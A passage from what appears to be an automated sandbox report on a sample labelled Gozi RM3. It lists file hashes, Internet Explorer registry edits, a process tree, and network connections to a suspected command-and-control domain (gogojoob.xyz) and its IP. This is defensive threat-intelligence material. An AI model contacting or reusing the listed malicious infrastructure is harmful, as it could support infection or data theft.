| SHA512 | f78001c1ecb38b4f05aae055f7fa42560d208d8412d9c90efa8a234cd4629e7297e0c5fa8f312254ac9df350a43d1dc1c7e46f8a6d5e804548b0896321a34928 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat
| MD5 | a3f73d3a60f4be84c4e27d6994abe16b |
| SHA1 | 0baa602a468904327a6f2fdfddfa12259c5e3e7a |
| SHA256 | f288c3789c35db67f27299a4583013f6e6b5af1528c7b5e1587a637890b3e242 |
| SHA512 | fdbde558da7d56f7bb7d4f899d77fca14d08a72a218b062a24d2e080cf744bf481fb90bc9cb1be00c0237f068878e60724f73978aef3b82a74e486ea85fb8f85 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat
| MD5 | a3f73d3a60f4be84c4e27d6994abe16b |
| SHA1 | 0baa602a468904327a6f2fdfddfa12259c5e3e7a |
| SHA256 | f288c3789c35db67f27299a4583013f6e6b5af1528c7b5e1587a637890b3e242 |
| SHA512 | fdbde558da7d56f7bb7d4f899d77fca14d08a72a218b062a24d2e080cf744bf481fb90bc9cb1be00c0237f068878e60724f73978aef3b82a74e486ea85fb8f85 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OL83HNN\favicon[1].ico
| MD5 | a976d227e5d1dcf62f5f7e623211dd1b |
| SHA1 | a2a9dc1abdd3d888484678663928cb024c359ee6 |
| SHA256 | 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271 |
| SHA512 | 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ed9990235f2898c87291691a776262d4 |
| SHA1 | 6dba7cede1f993610fa6f05ab497f62f9e899c01 |
| SHA256 | 54a4dc682d1aadf52ef00e3ed6f1f49ff01bbec79fa0320d919778c0b0329354 |
| SHA512 | 997e63e0e099e0593c7b40ea140e76ac083add68813ae4745a2f558fdaaa3a5b0ddc42c0f509ea7b08579ed80af7dc5fa12bf5611f8b521116e1b57857de0484 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\W9L00R8P.txt
| MD5 | 337da72421b1a9617fee0412671b29aa |
| SHA1 | 463cae18081382950c00a54b208a3859f441dc3e |
| SHA256 | 4dadc8fd0555db473bdd76315881591c8800125bff589a730119952d10e54fb3 |
| SHA512 | e30f12291f3899f5cbe9e0420079cfa8255f69a9c6cefa9087d0e4dd033cdfcecc08c3b0a0f2a48a0750a5d2cf9bb930a7f646c94e2988892675cc89407084c9 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-16 16:30
Reported
2022-03-16 16:34
Platform
win10v2004-20220310-en
Max time kernel
168s
Max time network
181s
Command Line
Signatures
Gozi RM3
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e06236035c39d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4227150718" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000f12a17c8b56c3da905d5bda673fb49114a699598a68b5299094926d0f1d2bf83000000000e80000000020000200000009b97c407eb9b6e877838ad568641d2ccb3c4552c8fb2cad13c516c365b5ccef3c00000000353a6e38cec71b6cd8b3b6e78613bb7eee21f32b27b13ebbb890ba3ef6d213dc3214660566e8e110fedf640a75607c1a080cad10cd3c235c9efcebf7d62a0eb8da99c18e84e343407786030efeeb58e2c1045e018b0a40b94f0d5a53dfd9950f587315031aea86f200877e0bfec078804d3745c0976819b25d8782d64e3dc8b01c0155ddd0b8f39ea7ef0aa54c8bbed93ca5a0499af3c48df8eff9a490b5d5056a52b4b4fb3f36fe93af1524a96cae2f3d23b81bc7a330fe39b0810b0deda38400000009d652d6868bd0de03495b1dfaaf52aacbf6abcd1d309936c7c1b1294ff892b208ae5bd638c337bf743333285c99843535cbfaa275883f5239ffdfa9818167f55 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9013ed045c39d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000aaafd7b8dc951602c8d9c32b6cbf5809f869a5d8ec6c687462876a054dcd4e9b000000000e800000000200002000000002a0189ccef677114672caf239cd6272ed9bd32c27244680dd879b40c4af35dec0000000269e9ef683d331b99d937c498acfaf00ed13d3a8178883e58b0d0ad315c55239ad68ba015f3c96444a774e5c0d5575eedd30bb35f0ee9c944476e249f8fb44a60686477c2331d41869be36fb5bb80b82682b12f51d18f77b3481c5ea99cf491b8d1d50a7fed2a29bc99a876592aa02e71c610c5bedfbb2f8aefc84f322297643da75400e82badb935d9cb0ce73034cfbd1f13d7a0bf2724734bffdf60b73f593b331fe2add403e08abc6ad99ff54bc06815a5ac18750782b5f2853e77bc38d7940000000f57c4d852eeedb9dd4f12a23af4a6848c0c3e5ae98e9cf0459598d8f43980052730b91b9b7561538b869835b529382136dd49c1d63e8d4c12da97d2178126029 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000e764cedf717099b62b243e3f0b0d71fec32127e0e67c27a01e4187e8aed24731000000000e8000000002000020000000e4245d103e71e70630884964ef2550592768c5cc24e03cd15cf3c4c9facd2037200000000279a15ee9174cfc4dc95cfa8d2057992b22d2b0c7b3841f87b6bfe769a7e0a640000000ba290669b244e3b5f3435007e1f0b218c8b5d54634e03ef9433c512f29afa4badafe8d7688173bccff0032a3f58407dbd8ee87b4887e16862f327ee5b59a8951 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947675" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{1BA970A1-A54F-11EC-B9E2-D64E15259B99} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947675" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000039408b5b8a5d5143bc7482930d75e1eb390df1e9e885da7b164c728528d395dd000000000e8000000002000020000000f765f7ab37255f3705b692a14648c9105a72f67a3e0cb075eb06333c83665eeec0000000259275f7309c656aa200b162bdc939e1ff3a52a34f65a5030822d172175e06fe9af4feb68805786d9aebcd8218ed38d21927302ecf669125601f02bce7eabc4d1590a4a15c5c81dfed5a855220b0f644f958f3c7fb001de8914cfd8d068ebbd7b303f609eeecf02ce6f5345f48f52c7867a64b1078f0f176b7879224acf05481ddfd6c095c8eaa8c9ef458808914e5872959239ef14d6b68d446dc6b424ae11682762c47dc2fea26e9e1ba2439318ca0c4935f03a62ab6ad44628e80ab3e6b034000000000fb6a12586887a0abd5add069fb3d88a4b9964ceb716e121894e8db0771c5a8d502a11f900b5a2c165dcd5dbcea3a93019ec5f4a43e0b4ec5b5eb6cc8635bb1 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3982930785" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947675" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3983400501" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b6000000000200000000001066000000010000200000001fa0dd0a0786415098b5150a248926105d08378ce498a9056398d69c52851ac1000000000e80000000020000200000007b74632292aeff61003001a7aaa192ae112be7670df6c1c947db0a978b8303832000000006f7c7d36a4477a29eccd8ffc78b176f3b187183cc6714aa59acf7176cb9aec540000000a10e4a6dc99a2c035e1c889d7c2fe66a4a766665ff1c5e1b9451487401fc84849ebf406d4848291801c38f5626eaea5c98fdae42fb81f1b5b08dda29310592fa | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\bca43b8251b1c4ac499b1d0543a86aee4fd76da1e203f011f0f1e68a03844820.exe
"C:\Users\Admin\AppData\Local\Temp\bca43b8251b1c4ac499b1d0543a86aee4fd76da1e203f011f0f1e68a03844820.exe"
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:17410 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:82950 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:82954 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2716 CREDAT:82958 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 52.109.8.20:443 | tcp | |
| US | 52.109.8.20:443 | tcp | |
| US | 8.8.8.8:53 | api.msn.com | udp |
| US | 131.253.33.203:443 | api.msn.com | tcp |
| NL | 104.80.225.205:443 | tcp | |
| BE | 67.27.153.254:80 | tcp | |
| BE | 67.27.153.254:80 | tcp | |
| BE | 67.27.153.254:80 | tcp | |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
Files
memory/592-134-0x000000000070D000-0x0000000000718000-memory.dmp
memory/592-135-0x000000000070D000-0x0000000000718000-memory.dmp
memory/592-136-0x0000000000690000-0x000000000069C000-memory.dmp
memory/592-137-0x0000000001000000-0x000000000106F000-memory.dmp
memory/592-138-0x00000000006A0000-0x00000000006B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GGB3KH7Z\favicon[2].ico
| MD5 | a976d227e5d1dcf62f5f7e623211dd1b |
| SHA1 | a2a9dc1abdd3d888484678663928cb024c359ee6 |
| SHA256 | 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271 |
| SHA512 | 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\2psodd8\imagestore.dat
| MD5 | ab047b08b57a2ddd7ffa030c4774ce2a |
| SHA1 | bc7416fb5d00876b4bd4e298db2cae210d4b31a6 |
| SHA256 | a4f6c5fda079c2c4751e651317bd8d10b65698a44a2c56762cc410727766b54e |
| SHA512 | d3b5a5c91cb9018f599b0f9c37727c1e8ef84e259db2794afce428fae97ef12b7245f0b31e347ce6bfa7b501f6dc4431d889c7b14a4a382ac12f0d24f99a765f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 54e9306f95f32e50ccd58af19753d929 |
| SHA1 | eab9457321f34d4dcf7d4a0ac83edc9131bf7c57 |
| SHA256 | 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72 |
| SHA512 | 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | d6fe2a0237d4c683ec6f37b14fd480bc |
| SHA1 | 382b9c8b492e71be21167dfdab9354c69d55b528 |
| SHA256 | a74c1064bd38f2a09aeb34f69c8cf54f71442e306997684f4e943fd08dbc131a |
| SHA512 | 70bfaad48ac87c792c43e0c24cf655e374663e282e50fd1cdd0f4a59d0984aad01287f97d6bc6b791234b79882049d09f4a61f2d5b96fc4f24e3a067afe23612 |